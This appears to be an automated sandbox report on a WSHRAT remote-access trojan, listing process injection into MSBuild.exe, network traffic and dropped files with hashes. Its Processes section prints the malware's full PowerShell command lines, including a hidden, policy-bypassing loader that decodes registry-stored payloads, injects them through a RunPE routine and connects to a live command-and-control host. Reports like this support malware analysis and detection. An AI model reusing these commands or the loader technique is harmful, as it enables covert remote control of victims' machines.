Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3372 wrote to memory of 3436 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 3372 wrote to memory of 3436 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 3436 wrote to memory of 4304 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3436 wrote to memory of 4304 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3436 wrote to memory of 3264 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3436 wrote to memory of 3264 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3436 wrote to memory of 864 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3436 wrote to memory of 864 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 864 wrote to memory of 2160 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 864 wrote to memory of 2160 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 864 wrote to memory of 2160 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 864 wrote to memory of 2160 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 864 wrote to memory of 2160 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 864 wrote to memory of 2160 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 864 wrote to memory of 2160 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 864 wrote to memory of 2160 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 864 wrote to memory of 2160 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Local\Temp\launcher service.js"

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\launcher service.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'ben738sj11xz.mywire.org 5478 \"WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands\" 1'));"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

path ben738sj11xz.mywire.org 5478 "WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands" 1

Network

Country Destination Domain Proto
US 52.109.12.18:443 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ben738sj11xz.mywire.org udp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
DE 23.51.123.27:80 tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp

Files

memory/3436-115-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\launcher service.js

MD5 8dce2fac1cdb56ef997f0c4f8065f82e
SHA1 da01f70d7035a8e8421d2296c7b481dc6dcb2b09
SHA256 6774ae9c26be549fc9096af5859d3e1614b2ce6993fde4ee85b7301134161411
SHA512 cb622198fee5d9810e6762f82c78da1a3868b1b67061d788b1af124f6f39456de73b7ba90452098983ff32762f28d471b1c546d228a393cf7364e1babfaac6a3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js

MD5 28d4b39c5ab839e66afd24b3789e28c7
SHA1 1e13f0ff2bcfcbf04b6ed9e6225d5772a3b5bb13
SHA256 c3a8a50de9d7aa5142a35612187d9f315134420f36310b18a4da7dbf4826a0aa
SHA512 27b95b87cbe1d8b602df02a95e3ed3e7737a5adfc94d903ea95ecce501a569ef582bc370911b35c1c48ab90a93ad3fea340bf017f2e032607230b52c188be51b

memory/4304-118-0x0000000000000000-mapping.dmp

memory/4304-119-0x00000120974F0000-0x00000120974F2000-memory.dmp

memory/4304-120-0x00000120974F0000-0x00000120974F2000-memory.dmp

memory/4304-121-0x00000120974F0000-0x00000120974F2000-memory.dmp

memory/4304-122-0x00000120974F0000-0x00000120974F2000-memory.dmp

memory/4304-123-0x00000120974F0000-0x00000120974F2000-memory.dmp

memory/4304-124-0x00000120B33D0000-0x00000120B33D1000-memory.dmp

memory/4304-125-0x00000120974F0000-0x00000120974F2000-memory.dmp

memory/4304-127-0x00000120974F0000-0x00000120974F2000-memory.dmp

memory/4304-129-0x00000120974F0000-0x00000120974F2000-memory.dmp

memory/4304-128-0x00000120974F0000-0x00000120974F2000-memory.dmp

memory/4304-130-0x00000120B3780000-0x00000120B3781000-memory.dmp

memory/4304-131-0x00000120974F0000-0x00000120974F2000-memory.dmp

memory/4304-137-0x00000120974F0000-0x00000120974F2000-memory.dmp

memory/4304-138-0x00000120974F0000-0x00000120974F2000-memory.dmp

memory/4304-142-0x00000120974F0000-0x00000120974F2000-memory.dmp

memory/4304-143-0x0000012097500000-0x0000012097502000-memory.dmp

memory/4304-144-0x0000012097503000-0x0000012097505000-memory.dmp

memory/4304-145-0x00000120974F0000-0x00000120974F2000-memory.dmp

memory/3264-146-0x0000000000000000-mapping.dmp

memory/4304-147-0x0000012097506000-0x0000012097508000-memory.dmp

memory/3264-149-0x000002CD211D0000-0x000002CD211D2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8a313b70fd641fc4e6fffb40391d0b4d
SHA1 22684fe19ecd7943ac18e622db0d7f161db500e8
SHA256 bd33eb064e32cf8d9af160e3304d3f0e1b90bdc9ab5116c16ba87d9a14060911
SHA512 5b72cd7e301ad3825bf1465840f52abb885c2481700df5dfa299c30aa6b61613dac8fc1386895cffec48b8229cba77085f672a80e42d7fd07c73eafd962e1246

memory/3264-150-0x000002CD211D0000-0x000002CD211D2000-memory.dmp

memory/3264-151-0x000002CD211D0000-0x000002CD211D2000-memory.dmp

memory/3264-152-0x000002CD211D0000-0x000002CD211D2000-memory.dmp

memory/3264-153-0x000002CD211D0000-0x000002CD211D2000-memory.dmp

memory/3264-155-0x000002CD211D0000-0x000002CD211D2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dbbeee3c97557a70459b6d579e0d23bf
SHA1 00e30dbe674d7c561da954a7059a719f864fcdde
SHA256 503b948d4073ee324fb320d16c13e589b8aee0f6c254c5c9e4c52b3d4b4d48e7
SHA512 dde59ef8c9b4e948ceab50389a8d4d4677596038c217f80270c8e8ace209e80bbe35984c9168c0040f67a78bb58c6c9ca5ebc5d242e4c1027c83bbfeffecbc09

memory/3264-158-0x000002CD211D0000-0x000002CD211D2000-memory.dmp

memory/3264-159-0x000002CD211D0000-0x000002CD211D2000-memory.dmp

memory/3264-160-0x000002CD211D0000-0x000002CD211D2000-memory.dmp

memory/3264-162-0x000002CD211D0000-0x000002CD211D2000-memory.dmp

memory/3264-172-0x000002CD211D0000-0x000002CD211D2000-memory.dmp

memory/3264-173-0x000002CD211D0000-0x000002CD211D2000-memory.dmp

memory/864-174-0x0000000000000000-mapping.dmp

memory/3264-176-0x000002CD22C43000-0x000002CD22C45000-memory.dmp

memory/3264-177-0x000002CD22C46000-0x000002CD22C48000-memory.dmp

memory/3264-175-0x000002CD22C40000-0x000002CD22C42000-memory.dmp

memory/864-178-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp

memory/864-179-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp

memory/864-180-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp

memory/864-182-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp

memory/864-181-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp

memory/864-184-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 98cd985d8372e4230d6f0ff9af003fd0
SHA1 d6b538603d60624cfd00404d141eab9e50025c7f
SHA256 e05e0f99f07a63bd7943f876777e10e4600536aecbfc184d51c33e69a1900a32
SHA512 56d2e322cdfdb7eae5244999faf30a4c16b95e7461cef5d0b8b2518ff06db7b6ed01c7a822b99a566126ee6265ce0c698d5d276302fcf0bd74ed8ccbab25c01e

memory/864-187-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp

memory/864-189-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp

memory/864-188-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp

memory/864-191-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp

memory/2160-199-0x00000000004071AE-mapping.dmp

memory/864-202-0x0000024CB9C23000-0x0000024CB9C25000-memory.dmp

memory/864-201-0x0000024CB9C20000-0x0000024CB9C22000-memory.dmp

memory/864-203-0x0000024CB9C26000-0x0000024CB9C28000-memory.dmp

memory/2160-209-0x00000000051E0000-0x00000000051E1000-memory.dmp